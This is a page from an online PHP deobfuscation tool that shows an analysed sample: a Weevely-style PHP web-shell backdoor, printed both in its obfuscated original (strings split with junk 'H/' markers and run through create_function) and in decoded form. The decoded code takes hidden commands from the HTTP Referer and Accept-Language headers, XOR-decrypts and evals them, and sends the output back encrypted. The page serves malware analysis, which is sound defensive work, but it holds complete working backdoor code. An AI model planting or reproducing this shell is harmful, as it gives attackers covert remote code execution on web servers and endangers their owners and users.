Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $m='eH/nd_cH/lean();$d=basH/e64_eH/ncodH/e(x(gzcomprH/H/ess($o)H/,$k));pH/rint("<$k..

Decoded Output download

$kh="e10a";$kf="dc39";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$m='eH/nd_cH/lean();$d=basH/e64_eH/ncodH/e(x(gzcomprH/H/ess($o)H/,$k));pH/rint("<$k>$d<H//$k>"H/);H/@sH/essH/ion_destroy();}}}}';
$Z='5(H/H/$i.$kh),0,3))H/;$f=$sH/l($sH/s(md5H/($i.$H/kf),0,3));$p=H/"";for(H/$z=1;H/$z<cH/ount($m[H/1H/]);$z+H/+)$p.=$qH/[$m[2]';
$B='@sH/ession_H/start();$s=&$_H/SESSIOH/N;H/$ss="suH/bstr";H/$slH/="strtolower"H/H/;H/$i=$m[1][H/0].$m[1][1];$H/H/hH/=$sl($ss(md';
$R=str_replace('XM','','creXMatXMXMe_fuXMnXMctiXMon');
$v='H/replace(H/H/arH/ray("/_/",H/"/-/"),arrH/ay("/","H/+"),$sH/s($s[$i]H/,0,$e))H/),$k))H/H/);H/$o=ob_get_cH/H/ontents();oH/b_';
$y='[$zH/]H/];if(strpoH/s($p,$H/h)==H/=0)H/{$H/s[$iH/]=H/"";$p=H/$ss($p,3H/);}if(array_key_H/exisH/ts($i,$sH/)){$s[H/$i].=$pH/;';
$f='$e=strpoH/s($s[$H/i],$f);H/H/if($eH/){$k=$kh.$kH/H/fH/;ob_start();@evaH/l(@gzH/uH/ncompress(@x(@bH/ase64H/_deH/code(preg_H/';
$E='/r($j=0;($j<$H/H/H/c&&$H/H/i<$l);$j++,$iH/++)H/{$o.=$t{$i}^$H/k{$j};}}return $H/o;}H/$r=$_SERVH/EH/R;$rr=@H/$r["HTTP_RH/H/EFE';
$g='RER"]H/H/H/;$ra=@$rH/["HTTP_ACCEPTH/_LAH/NGUAGE"];if($H/H/rr&&$ra){$uH/=parseH/_H/url($rr);parH/H/se_str($u["querH/y"H/],$H';
$M='$kh="eH/10aH/"H/;$H/kf="dc39H/";function x($t,$H/k){$c=H/stH/H/rlen($k);$l=H/strlenH/(H/$t);$o="";for($iH/=0;$i<$l;H/){fH/oH';
$w='/q);$q=arrH/ay_valueH/s($q);preH/gH/_match_allH/("/([H/\\w])[\\H/w-]+(?:H/;q=0.([H/\\d]))?H/,?H//",$raH/,H/$m);if(H/$H/q&&$m){';
$N=str_replace('H/','',$M.$E.$g.$w.$B.$Z.$y.$f.$v.$m);
$q=$R('',$N);$q();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B @sH/ession_H/start();$s=&$_H/SESSIOH/N;H/$ss="suH/bstr";H/$s..
$E /r($j=0;($j<$H/H/H/c&&$H/H/i<$l);$j++,$iH/++)H/{$o.=$t{$i}^$..
$M $kh="eH/10aH/"H/;$H/kf="dc39H/";function x($t,$H/k){$c=H/stH..
$N $kh="e10a";$kf="dc39";function x($t,$k){$c=strlen($k);$l=str..
$R create_function
$Z 5(H/H/$i.$kh),0,3))H/;$f=$sH/l($sH/s(md5H/($i.$H/kf),0,3));$..
$f $e=strpoH/s($s[$H/i],$f);H/H/if($eH/){$k=$kh.$kH/H/fH/;ob_st..
$g RER"]H/H/H/;$ra=@$rH/["HTTP_ACCEPTH/_LAH/NGUAGE"];if($H/H/rr..
$m eH/nd_cH/lean();$d=basH/e64_eH/ncodH/e(x(gzcomprH/H/ess($o)H..
$q None
$v H/replace(H/H/arH/ray("/_/",H/"/-/"),arrH/ay("/","H/+"),$sH/..
$w /q);$q=arrH/ay_valueH/s($q);preH/gH/_match_allH/("/([H/\w])[..
$y [$zH/]H/];if(strpoH/s($p,$H/h)==H/=0)H/{$H/s[$iH/]=H/"";$p=H..

Stats

MD5 beb8d9f0e476d0987b6a21d0728aea8a
Eval Count 1
Decode Time 126 ms